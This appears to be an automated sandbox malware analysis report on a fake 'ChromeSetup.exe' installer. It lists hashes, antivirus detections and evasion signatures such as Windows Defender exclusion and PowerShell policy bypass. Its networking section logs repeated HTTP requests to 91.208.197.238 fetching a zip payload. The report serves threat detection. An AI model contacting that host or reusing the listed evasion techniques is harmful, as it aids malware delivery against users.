Windows Analysis Report
ChromeSetup.exe

Overview

General Information

Sample name:	ChromeSetup.exe
Analysis ID:	1631885
MD5:	399c3320b324ff609891de75be32bf73
SHA1:	70aed741554513d96f31109033f8e4fff17e7633
SHA256:	7544df9edd35749e132b8f586cef88127dcbea491ab128271fc3b2abd94e01d5
Tags:	exeuser-aachum
Infos:

Detection

Score:	63
Range:	0 - 100
Confidence:	100%

Compliance

Score:	34
Range:	0 - 100

Signatures

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

AI detected suspicious PE digital signature

Adds a directory exclusion to Windows Defender

Bypasses PowerShell execution policy

Loading BitLocker PowerShell Module

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Contains functionality for read data from the clipboard

Contains functionality to dynamically determine API calls

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

EXE planting / hijacking vulnerabilities found

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

Launches processes in debugging mode, may be used to hinder debugging

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Powershell Defender Exclusion

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Signatures

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe

Avira: detection malicious, Label: TR/AVI.Agent.wukun

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\RoadSpecialized-Launcher.exe

ReversingLabs: Detection: 47%

Multi AV Scanner detection for submitted file

Source: ChromeSetup.exe	ReversingLabs: Detection: 47%
Source: ChromeSetup.exe	Virustotal: Detection: 40%			Perma Link

Privilege Escalation

EXE planting / hijacking vulnerabilities found

Source: C:\Users\user\Desktop\ChromeSetup.exe

EXE: C:\Users\user\AppData\Local\RoadSpecialized-Launcher\uninst.exe

Jump to behavior

Compliance

EXE planting / hijacking vulnerabilities found

Source: C:\Users\user\Desktop\ChromeSetup.exe

EXE: C:\Users\user\AppData\Local\RoadSpecialized-Launcher\uninst.exe

Jump to behavior

Uses 32bit PE files

Source: ChromeSetup.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\README.txt	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\THIRDPARTYLICENSEREADME-JAVAFX.txt	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\THIRDPARTYLICENSEREADME-JAVAFX.txt	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\THIRDPARTYLICENSEREADME.txt	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	File created: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\THIRDPARTYLICENSEREADME.txt	Jump to behavior

Source: ChromeSetup.exe

Static PE information: certificate valid

Source: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\javaw.exe

File opened: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\bin\msvcr100.dll

Jump to behavior

Source: ChromeSetup.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: msvcr100.i386.pdb source: javaw.exe, 00000002.00000002.3392873090.000000006D031000.00000020.00000001.01000000.00000008.sdmp
Source:	Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\liblcms\lcms.pdb source: lcms.dll.0.dr
Source:	Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libnio\nio.pdb source: javaw.exe, 00000002.00000002.3391820133.000000006CBC7000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libt2k\t2k.pdb source: t2k.dll.0.dr
Source:	Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libjava\java.pdb source: javaw.exe, 00000002.00000002.3392107747.000000006CC33000.00000002.00000001.01000000.0000000B.sdmp, java.dll.0.dr
Source:	Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libnio\nio.pdbic source: javaw.exe, 00000002.00000002.3391820133.000000006CBC7000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: msvcr120.i386.pdb source: javaw.exe, 00000002.00000002.3391610094.000000006CAD1000.00000020.00000001.01000000.0000000F.sdmp
Source:	Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libjava\java.pdb'% source: javaw.exe, 00000002.00000002.3392107747.000000006CC33000.00000002.00000001.01000000.0000000B.sdmp, java.dll.0.dr
Source:	Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libzip\zip.pdb source: javaw.exe, 00000002.00000002.3392010694.000000006CC0A000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: msvcp120.i386.pdb source: javaw.exe, 00000002.00000002.3391479640.000000006CA51000.00000020.00000001.01000000.00000010.sdmp
Source:	Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libawt\awt.pdb source: javaw.exe, 00000002.00000002.3391040673.000000006BF99000.00000002.00000001.01000000.00000014.sdmp
Source:	Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libawt\awt.pdb8^ source: javaw.exe, 00000002.00000002.3391040673.000000006BF99000.00000002.00000001.01000000.00000014.sdmp
Source:	Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libnet\net.pdb source: javaw.exe, 00000002.00000002.3391902623.000000006CBDD000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: C:\Users\devuser\Documents\Visual Studio 2017\Projects\IBuilder\Release\NAct.pdb source: ChromeSetup.exe, 00000000.00000002.1074694666.0000000000420000.00000004.00000001.01000000.00000003.sdmp
Source:	Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libbci\bci.pdb source: bci.dll.0.dr
Source:	Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\libverify\verify.pdb source: javaw.exe, 00000002.00000002.3392205561.000000006CC56000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\javaw_objs\javaw.pdb source: javaw.exe, 00000002.00000002.3382359288.00000000005FC000.00000002.00000001.01000000.00000007.sdmp, javaw.exe, 00000002.00000000.1024355035.00000000005FC000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: c:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\jdk\objs\liblcms\lcms.pdb* source: lcms.dll.0.dr
Source:	Binary string: C:\re\workspace\8-2-build-windows-i586-cygwin\jdk8u101\7261\build\windows-i586\hotspot\windows_i486_compiler1\product\jvm.pdb source: javaw.exe, 00000002.00000002.3392485091.000000006CF21000.00000002.00000001.01000000.00000009.sdmp

Spreading

Source: C:\Users\user\Desktop\ChromeSetup.exe	Code function: 0_2_00406301 FindFirstFileW,FindClose,		0_2_00406301
Source: C:\Users\user\Desktop\ChromeSetup.exe	Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,		0_2_00406CC7

Source: C:\Users\user\Desktop\ChromeSetup.exe	File opened: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\lib\deploy	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	File opened: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Users\user\Desktop\ChromeSetup.exe	File opened: C:\Users\user\AppData\Local\Temp\RoadSpecialized-Launcher\lop00\	Jump to behavior

Networking

Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238
Source: unknown	TCP traffic detected without corresponding DNS query: 91.208.197.238

Source: global traffic	HTTP traffic detected: GET /dapp/partdevelopment.zip HTTP/1.1User-Agent: Java/1.8.0_101Host: 91.208.197.238Accept: text/html, image/gif, image/jpeg, ; q=.2, /*; q=.2Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /dapp/partdevelopment.zip HTTP/1.1User-Agent: Java/1.8.0_101Host: 91.208.197.238Accept: text/html, image/gif, image/jpeg, ; q=.2, /*; q=.2Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /dapp/partdevelopment.zip HTTP/1.1User-Agent: Java/1.8.0_101Host: 91.208.197.238Accept: text/html, image/gif, image/jpeg, ; q=.2, /*; q=.2Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /dapp/partdevelopment.zip HTTP/1.1User-Agent: Java/1.8.0_101Host: 91.208.197.238Accept: text/html, image/gif, image/jpeg, ; q=.2, /*; q=.2Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /dapp/partdevelopment.zip HTTP/1.1User-Agent: Java/1.8.0_101Host: 91.208.197.238Accept: text/html, image/gif, image/jpeg, ; q=.2, /*; q=.2Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /dapp/partdevelopment.zip HTTP/1.1User-Agent: Java/1.8.0_101Host: 91.208.197.238Accept: text/html, image/gif, image/jpeg, ; q=.2, /*; q=.2Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /dapp/partdevelopment.zip HTTP/1.1User-Agent: Java/1.8.0_101Host: 91.208.197.238Accept: text/html, image/gif, image/jpeg, ; q=.2, /*; q=.2Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /dapp/partdevelopment.zip HTTP/1.1User-Agent: Java/1.8.0_101Host: 91.208.197.238Accept: text/html, image/gif, image/jpeg, ; q=.2, /*; q=.2Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /dapp/partdevelopment.zip HTTP/1.1User-Agent: Java/1.8.0_101Host: 91.208.197.238Accept: text/html, image/gif, image/jpeg, ; q=.2, /*; q=.2Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /dapp/partdevelopment.zip HTTP/1.1User-Agent: Java/1.8.0_101Host: 91.208.197.238Accept: text/html, image/gif, image/jpeg, ; q=.2, /*; q=.2Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /dapp/partdevelopment.zip HTTP/1.1User-Agent: Java/1.8.0_101Host: 91.208.197.238Accept: text/html, image/gif, image/jpeg, ; q=.2, /*; q=.2Connection: keep-alive

Source: javaw.exe, 00000002.00000002.3384324223.0000000004DCA000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3384324223.0000000004A00000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3384324223.0000000004B07000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3384324223.0000000004BD9000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://91.208.197.238
Source: javaw.exe, 00000002.00000002.3384324223.0000000004BD9000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3387805134.0000000015805000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://91.208.197.238/dapp/partdevelopment.zip
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/
Source: javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/allow-java-encodings
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/allow-java-encodingsl
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/continue-after-fatal-error
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/create-cdata-nodes
Source: javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/disallow-doctype-decl
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/disallow-doctype-decllver
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/dom/create-entity-ref-nodes
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/dom/create-entity-ref-nodes/
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/dom/defer-node-expansion
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/dom/defer-node-expansionG
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/dom/include-ignorable-whitespace
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/dom/include-ignorable-whitespace:
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/generate-synthetic-annotations
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/honour-all-schemaLocations
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/honour-all-schemaLocationsx
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/include-comments
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/include-comments1
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/internal/parser-settings
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/internal/tolerate-duplicates
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/internal/tolerate-duplicatesX
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/internal/validation/schema/use-grammar-pool-only
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/namespace-growth
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/namespace-growth;
Source: javaw.exe, 00000002.00000003.1078204806.00000000157D4000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3387805134.00000000155E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/namespaces
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/nonvalidating/load-external-dtd
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/nonvalidating/load-external-dtdA
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/scanner/notify-builtin-refs
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/scanner/notify-char-refs
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/scanner/notify-char-refs:
Source: javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/standard-uri-conformant
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/standard-uri-conformantg/
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validate-annotations
Source: javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/balance-syntax-trees
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/dynamic
Source: javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema-full-checking
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema/augment-psvi
Source: javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema/element-default
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema/element-default=
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema/normalized-value
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema:
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/warn-on-duplicate-attdef
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/warn-on-undeclared-elemdef
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/warn-on-undeclared-elemdef3
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/warn-on-duplicate-entitydef
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/xinclude
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/xinclude/fixup-base-uris
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/xinclude/fixup-base-uris6
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000002.3385302759.000000000A426000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/xinclude/fixup-language
Source: javaw.exe, 00000002.00000002.3387349960.0000000014F15000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078081317.0000000014F44000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000002.00000003.1078737689.0000000014FB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/xincludeC
